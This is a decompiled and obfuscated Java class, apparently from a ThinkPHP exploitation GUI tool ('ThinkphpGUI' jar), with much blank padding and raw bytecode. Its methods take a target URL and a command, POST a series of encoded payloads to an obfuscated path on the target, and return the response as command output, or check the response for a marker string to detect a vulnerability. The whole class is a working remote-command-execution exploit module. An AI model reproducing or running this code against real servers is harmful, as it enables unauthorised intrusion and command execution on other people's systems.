/*     */ package a;
/*     */ 
/*     */ import App;
/*     */ import com.github.kevinsawicki.http.HttpRequest;
/*     */ import d.gb;
/*     */ import d.i;
/*     */ import d.pb;
/*     */ import d.yb;
/*     */ import java.util.Iterator;
/*     */ import m.k;
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ public class ca
/*     */   implements i
/*     */ {
/*     */   public yb ALLATORIxDEMO(String url, String cmd) throws Exception {
/*  67 */     String iiiIiiIiII = (new StringBuilder()).insert(0, url).append(App.ALLATORIxDEMO(pb.ALLATORIxDEMO("^u\002w\022+\001>\022\"\020l\005/\002>Lg@"))).toString();
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */     
/*     */     Iterator<?> iterator;
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */     
/* 337 */     for (; (iterator = (new ya(this, cmd)).iterator()).hasNext(); str2.printStackTrace()) { String str1 = (String)iterator.next();
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */ 
/*     */       
/*     */       try {
/* 362 */         str2 = HttpRequest.post(iiiIiiIiII).send(str1).body();
/*     */         String str;
/*     */         if ((str = str2.substring(0, str2.indexOf(gb.IiIIiIIIii(k.ALLATORIxDEMO("-"))))).equals(""))
/*     */           return new yb(true, "", str2); 
/*     */         return new yb(true, "", str);
/*     */       } catch (Exception str2) {} }
/*     */     
/*     */     return new yb(false, null, null);
/*     */   }
/*     */   
/*     */   public yb IiIIiIIIii(String url) throws Exception {
/*     */     // Byte code:
/*     */     //   0: new java/lang/StringBuilder
/*     */     //   3: dup
/*     */     //   4: invokespecial <init> : ()V
/*     */     //   7: iconst_0
/*     */     //   8: aload_1
/*     */     //   9: invokevirtual insert : (ILjava/lang/String;)Ljava/lang/StringBuilder;
/*     */     //   12: ldc '^uw+>"l/>Lg@'
/*     */     //   14: invokestatic ALLATORIxDEMO : (Ljava/lang/String;)Ljava/lang/String;
/*     */     //   17: invokestatic ALLATORIxDEMO : (Ljava/lang/String;)Ljava/lang/String;
/*     */     //   20: invokevirtual append : (Ljava/lang/String;)Ljava/lang/StringBuilder;
/*     */     //   23: invokevirtual toString : ()Ljava/lang/String;
/*     */     //   26: astore_2
/*     */     //   27: new a/t
/*     */     //   30: dup
/*     */     //   31: aload_0
/*     */     //   32: invokespecial <init> : (La/ca;)V
/*     */     //   35: astore_3
/*     */     //   36: iconst_0
/*     */     //   37: dup
/*     */     //   38: istore #4
/*     */     //   40: aload_3
/*     */     //   41: invokevirtual size : ()I
/*     */     //   44: if_icmpge -> 170
/*     */     //   47: aload_2
/*     */     //   48: invokestatic post : (Ljava/lang/CharSequence;)Lcom/github/kevinsawicki/http/HttpRequest;
/*     */     //   51: aload_3
/*     */     //   52: iload #4
/*     */     //   54: invokevirtual get : (I)Ljava/lang/Object;
/*     */     //   57: checkcast java/lang/CharSequence
/*     */     //   60: invokevirtual send : (Ljava/lang/CharSequence;)Lcom/github/kevinsawicki/http/HttpRequest;
/*     */     //   63: invokevirtual body : ()Ljava/lang/String;
/*     */     //   66: astore #5
/*     */     //   68: new java/lang/StringBuilder
/*     */     //   71: dup
/*     */     //   72: invokespecial <init> : ()V
/*     */     //   75: iconst_0
/*     */     //   76: aload_1
/*     */     //   77: invokevirtual insert : (ILjava/lang/String;)Ljava/lang/StringBuilder;
/*     */     //   80: ldc '3ayxmx2ata'
/*     */     //   82: invokestatic ALLATORIxDEMO : (Ljava/lang/String;)Ljava/lang/String;
/*     */     //   85: invokestatic IiIIiIIIii : (Ljava/lang/String;)Ljava/lang/String;
/*     */     //   88: invokevirtual append : (Ljava/lang/String;)Ljava/lang/StringBuilder;
/*     */     //   91: invokevirtual toString : ()Ljava/lang/String;
/*     */     //   94: invokestatic get : (Ljava/lang/CharSequence;)Lcom/github/kevinsawicki/http/HttpRequest;
/*     */     //   97: invokevirtual code : ()I
/*     */     //   100: sipush #200
/*     */     //   103: if_icmpne -> 160
/*     */     //   106: new d/yb
/*     */     //   109: dup
/*     */     //   110: new java/lang/StringBuilder
/*     */     //   113: iconst_1
/*     */     //   114: dup_x1
/*     */     //   115: dup
/*     */     //   116: pop2
/*     */     //   117: aconst_null
/*     */     //   118: dup_x1
/*     */     //   119: dup
/*     */     //   120: pop2
/*     */     //   121: dup
/*     */     //   122: invokespecial <init> : ()V
/*     */     //   125: aload_1
/*     */     //   126: invokevirtual append : (Ljava/lang/String;)Ljava/lang/StringBuilder;
/*     */     //   129: ldc '^:# #_::QjQ9p/;'
/*     */     //   131: invokestatic ALLATORIxDEMO : (Ljava/lang/String;)Ljava/lang/String;
/*     */     //   134: invokestatic ALLATORIxDEMO : (Ljava/lang/String;)Ljava/lang/String;
/*     */     //   137: invokevirtual append : (Ljava/lang/String;)Ljava/lang/StringBuilder;
/*     */     //   140: invokevirtual toString : ()Ljava/lang/String;
/*     */     //   143: invokespecial <init> : (ZLjava/lang/String;Ljava/lang/String;)V
/*     */     //   146: areturn
/*     */     //   147: nop
/*     */     //   148: nop
/*     */     //   149: nop
/*     */     //   150: nop
/*     */     //   151: nop
/*     */     //   152: athrow
/*     */     //   153: astore #5
/*     */     //   155: aload #5
/*     */     //   157: invokevirtual printStackTrace : ()V
/*     */     //   160: iinc #4, 1
/*     */     //   163: iload #4
/*     */     //   165: aload_3
/*     */     //   166: goto -> 41
/*     */     //   169: athrow
/*     */     //   170: new d/yb
/*     */     //   173: dup
/*     */     //   174: iconst_0
/*     */     //   175: aconst_null
/*     */     //   176: dup
/*     */     //   177: invokespecial <init> : (ZLjava/lang/String;Ljava/lang/String;)V
/*     */     //   180: areturn
/*     */     // Line number table:
/*     */     //   Java source line number -> byte code offset
/*     */     //   #137	-> 0
/*     */     //   #321	-> 27
/*     */     //   #353	-> 36
/*     */     //   #23	-> 47
/*     */     //   #212	-> 68
/*     */     //   #271	-> 100
/*     */     //   #49	-> 106
/*     */     //   #231	-> 148
/*     */     //   #193	-> 153
/*     */     //   #8	-> 155
/*     */     //   #353	-> 160
/*     */     //   #57	-> 170
/*     */     // Local variable table:
/*     */     //   start	length	slot	name	descriptor
/*     */     //   0	181	0	this	La/ca;
/*     */     //   0	181	1	url	Ljava/lang/String;
/*     */     //   27	154	2	iiiIiiIiII	Ljava/lang/String;
/*     */     //   36	145	3	iiiIiiIiII	Ljava/util/ArrayList;
/*     */     //   38	143	4	iiiIiiIiII	I
/*     */     //   155	26	5	iiiIiiIiII	Ljava/lang/Exception;
/*     */     //   68	107	5	iiiIiiIiII	Ljava/lang/String;
/*     */     // Exception table:
/*     */     //   from	to	target	type
/*     */     //   47	146	153	java/lang/Exception
/*     */   }
/*     */   
/*     */   public yb ALLATORIxDEMO(String url) throws Exception {
/*     */     String iiiIiiIiII = gb.IiIIiIIIii(k.ALLATORIxDEMO("ATA<Gycoxs"));
/*     */     String str1 = (new StringBuilder()).insert(0, url).append(App.ALLATORIxDEMO(pb.ALLATORIxDEMO("^u\002w\022+\001>\022\"\020l\005/\002>Lg@"))).toString();
/*     */     Iterator<?> iterator = (new a(this)).iterator();
/*     */     label21: while (true) {
/*     */       while (iterator.hasNext()) {
/*     */         String str = (String)iterator.next();
/*     */         try {
/*     */           HttpRequest httpRequest;
/*     */           if ((httpRequest = HttpRequest.post(str1).send(str)).body().contains(iiiIiiIiII))
/*     */             return new yb(true, gb.IiIIiIIIii(k.ALLATORIxDEMO("EtxrzLYL1)?,?.\"<C_T")), (new StringBuilder()).insert(0, str1).append(App.ALLATORIxDEMO(pb.ALLATORIxDEMO("Q\032\0369\005pQ"))).append(str).toString()); 
/*     */         } catch (Exception exception) {}
/*     */         continue label21;
/*     */       } 
/*     */       break;
/*     */     } 
/*     */     return new yb(false, gb.IiIIiIIIii(k.ALLATORIxDEMO("EtxrzLYL1)?,?.\"<C_T")), "");
/*     */   }
/*     */ }


/* Location:              C:\Users\zyh\Desktop\ThinkphpGUI-1.3-SNAPSHOT.jar!\a\ca.class
 * Java compiler version: 8 (52.0)
 * JD-Core Version:       1.1.3
 */